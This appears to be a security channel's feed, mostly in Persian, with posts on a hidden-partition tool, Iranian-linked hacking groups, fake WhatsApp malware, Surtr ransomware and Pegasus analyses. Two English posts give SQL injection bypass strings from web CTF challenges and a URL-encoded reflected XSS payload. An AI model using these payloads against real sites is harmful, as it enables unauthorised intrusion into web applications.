Source Byte

نرم افزار متن باز Shufflecake یکی از نرم افزارهایی هست که با ایجاد پارتیشن مخفی در هارد دیسک لپ تاپ یا PC میتونه در مخفی نگه داشتن فایلهای حساس مخصوصا برای خبرنگارها و ژورنالیستها بسیار مفید باشه بطوریکه حتی نرم افزارهای دیجیتال فارنزیکز هم کارایی چندانی در مقابلش ندارند.

http://lobuhi.github.io Search across 6500+ hacking tools and resources from: Intigrity Newsletter TL:DR Sec Newsletter Kitploit twitter.com/carlospolopm Hacktricks and Hacktricks-Cloud twitter.com/six2dez Pentest Book and other sources Contributor twitter.com/lobuhisec

Nuclei, httpx, subfinder, dnsx, uncover, cloudlist, Notify, naabu are open source tools by projectdiscovery.io You can build an Attack Surface Management automation for 0$

این گزارش که چند روز پیش منتشرشده یکی از بهترین منابعی است که بطور مختصر و مفید به معرفی گروههای مختلف #هکری وابسته به ج.ا، تکنیکهای مورد استفاده و برخی از مهمترین عملیات سایبری منتسب به اونها پرداخته است. جالبه که بدونید براساس این گزارش به هفت گروه هکری اشاره شده که از کلمه ’بچه گربه’ یا kitten در نامگذاری آنها استفادع شده. اسامی این هفت گروه عبارت است از: Charming kitten, Static kitten, Pioneer kitten, Remix kitten, Helix kitten, Refined kitten, and Magic kitten

⭕️ شناسایی بیش از ۳۰۰ نسخه بدافزار مرتبط با واتساپ توسط بیت‌بان 🧑🏻‍💻 تیم تحلیل بدافزار بیت‌بان طبق آخرین بررسی‌های خود، تعداد ۳۲۹ نسخه بدافزار اندرویدی را شناسایی کرده، که یا نسخه‌های جعلی واتساپ بوده‌اند یا به عنوان ابزارهای کمکی و مرتبط با واتساپ قصد آلوده کردن دستگاه کاربران را داشته‌اند. 👾 این بدافزارها به‌طور کلی در دسته‌های مخرب زیر قرار می‌گیرند: ۱. تروجان ۲. جاسوس‌افزار ۳. ریسک‌افزار (AppRisk - PUP/PUA - SPR) ۴. تبلیغ‌افزار (AdLibrary - Notifyer - Adpush - Hiddad - Hiddapp) 🤖 نام نسخه‌های پرنصب > GBWhatsApp > YOWhatsApp > FMWhatsapp > ADWhatsApp > OGWhatsApp > واتساپ استیکر > واتساپ یار طلایی > صفر تا صد واتساپ > پیام حذف شده واتساپ > جی بی واتساپ > اوجی واتساپ 💎 تمامی این بدافزارها توسط اپلیکیشن ضدبدافزار بیت‌بان شناسایی می‌شوند. 🌐 اطلاعات بیش از ۲۰۰ نسخه از بدافزارها

Some handy SQLi bypassing i used recently with webCTF challenges 1- 'dal'//UNION//SELECT//*// FROM//users//LIMIT/**/1; 2- adm'||'in'; 3- admin’;--

شرکت Ahnlab گزارشی از کمپین باج افزار Surtr منتشرکرده. دربخشی از گزارش عنوان شده که این باج افزاز قبل از رمزنگاری اطلاعات کاربران محل جغرافیایی کاربر رو از روی IP چک میکنه و اگر کاربر دریکی از کشورهای زیر (شامل ایران) باشه، باج افزار کاری نمیکنه و فقط به کاربر یک پیام اخطار میده

A summary of UAV operations conducted by Russian troops: #Drone

He is man of culture 😂

Reflected xss :) Payload : %27%2B%3C%2FScripT%3E%3CScRIpT%3Eprompt%28document.domain%29%3C%2FscRIpT%3E%2B%27

اگر علاقه مند به حوزه آنالیز #بدافرار یا همون Malware Analysis هستید، توصیه میکنم این سه گزارش فنی با جزییات بسیار ارزشمند درخصوص بدافزار #پگاسوس Pegasus رو حتما چک کنید. بخش اول https://cybergeeks.tech/a-technical-analysis-of-pegasus-for-android-part-1/ بخش دوم https://cybergeeks.tech/a-technical-analysis-of-pegasus-for-android-part-2/ بخش سوم https://cybergeeks.tech/a-technical-analysis-of-pegasus-for-android-part-3/

مهمان این هفته پادکست دارکنِت دایاریز خانم مَدی استون کارشناس امنیت و از اعضای پروژه صفرشرکت گوکل بود. دراین اپیزود موضوعات جالبی مثل نحوه شناسایی بدافزارهای اندروید، چگونگی مهندسی معکوس بدافزار های موجود و کشف آسیب پذیریهای روز صفر رو با مدی به بحث وگفتگو گذاشت. یکی از نکات جالب گفتگو مرور اجمالی نحوه کارکرد سیستم Google Play Protect بود که اخیرا نرم افزار روبیکا رو بدافزار تشخیص داد. https://darknetdiaries.com/episode/127/

the family photo of Zelesanki and his father